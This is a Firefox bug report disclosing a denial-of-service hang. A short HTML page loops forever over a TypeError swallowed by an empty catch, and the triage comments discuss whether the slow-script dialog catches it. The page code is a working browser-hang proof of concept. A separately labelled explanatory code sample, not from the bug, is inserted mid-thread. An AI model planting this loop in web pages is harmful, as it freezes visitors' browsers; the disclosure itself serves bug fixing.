Open Bug 1332563 Opened 8 years ago Updated 2 years ago

Denial Of Service via try and catch and encodeURI

Categories: Core :: JavaScript Engine, defect, P3, 50 Branch

Tracking: UNCONFIRMED

People: Reporter: mishra.dhiraj95, Unassigned

References: Blocks 1 open bug

Details: 5 keywords, Whiteboard: [sg:dos] infinite loop

User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Build ID: 20161208153507

Steps to reproduce:

I am using:
Name 	Firefox
Version 	50.1.0
Build ID 	20161208153507
User Agent 	Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
OS 	Windows_NT 6.1

Steps to Reproduce:
1. Visit http://hackies.in/force.html
2. A crash ID is generated


Code:
<html><head><title></title>
<script type="text/javascript">
// Busy loop: the body throws a TypeError on every iteration and the empty
// catch swallows it, so the loop never exits and the main thread never yields.
while (true) try {
        var object = { };
        function g(f0) {
                // encodeURI is a built-in function with no .prototype property,
                // so the instanceof check itself throws a TypeError before any
                // call is attempted (and false('foo') would throw one anyway).
                var f0 = (object instanceof encodeURI)('foo');
        }
        g(75);
} catch (g) { }
</script>
</head></html>


Crash ID:
https://crash-stats.mozilla.com/report/index/a265cc1e-e710-465a-8963-de4f72170120

Actual results:

It's impossible to click anywhere further in the application window.

Works on all platforms and various versions as well.
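As an added illustration (not code from the bug report or from Mozilla), the loop body above in isolation under Node.js or a browser console, showing why the empty catch never ends the loop, a deadline-bounded version of the same loop, and a chunked variant that yields to the scheduler instead of pinning the main thread. The names oneIteration, spinWithDeadline and runChunked, and the injected schedule callback, are this example's own:

```javascript
// Added example, not code from the bug report: the reporter's loop body in
// isolation, plus a deadline-bounded version of the loop so it can terminate.
// Runs under Node.js or in a browser console; nothing page-specific is assumed.

const object = {};

// One iteration of the reporter's loop body, reporting what happened.
// encodeURI is a built-in function with no `prototype` property, so
// `object instanceof encodeURI` throws a TypeError before any call happens
// (and had it returned false, `false('foo')` would throw a TypeError too).
function oneIteration() {
  try {
    var f0 = (object instanceof encodeURI)('foo');
    return { threw: false, value: f0 };
  } catch (e) {
    return { threw: true, name: e.name, message: e.message };
  }
}

// The reporter's `while (true) try { ... } catch (g) { }` with a wall-clock
// budget. Every iteration throws and is swallowed, so without the budget the
// only way out is the browser's slow-script watchdog or killing the tab.
// Returns the number of swallowed exceptions.
function spinWithDeadline(ms) {
  const deadline = Date.now() + ms;
  let swallowed = 0;
  while (Date.now() < deadline) {
    try {
      (object instanceof encodeURI)('foo');
    } catch (g) {
      swallowed++;
    }
  }
  return swallowed;
}

// A cooperative alternative: the same work split into fixed-size chunks that
// hand control back to the scheduler between chunks, so a page doing heavy
// work keeps the UI responsive. `schedule` is injected (setTimeout in a
// browser) so the pattern can also be driven synchronously, as in a test.
function runChunked(iterations, chunkSize, schedule, done) {
  let remaining = iterations;
  let swallowed = 0;
  function chunk() {
    for (let i = 0; i < chunkSize && remaining > 0; i++, remaining--) {
      try {
        (object instanceof encodeURI)('foo');
      } catch (g) {
        swallowed++;
      }
    }
    if (remaining > 0) schedule(chunk);
    else done(swallowed);
  }
  schedule(chunk);
}
```

In a browser, `spinWithDeadline(60000)` reproduces the hang closely enough to trigger the slow-script dialog (or not, depending on how long the watchdog takes to get a turn), while `runChunked(1e6, 1e4, fn => setTimeout(fn, 0), console.log)` does the same amount of swallowed-exception work without ever blocking input events.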
This is a hang (and eventual kill) due to the infinite loop. Why didn't the "slow script" dialog give you a chance to kill it?
Group: firefox-core-security
Component: Untriaged → JavaScript Engine
Product: Firefox → Core
Whiteboard: [sg:dos] infinite loop
Works for me, after a few seconds the "slow script" dialog pops up and lets me kill the script.

Firefox 51.0.1 (64-bit)
UA: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
Build ID: 20170201174907
OS: Ubuntu 16.10
WFM: in Ubuntu it gives the slow script popup and kills the script, but sometimes this happens; probably FF freezes before it can show the stop script popup.
Keywords: triage-deferred
Priority: -- → P3
Severity: normal → S3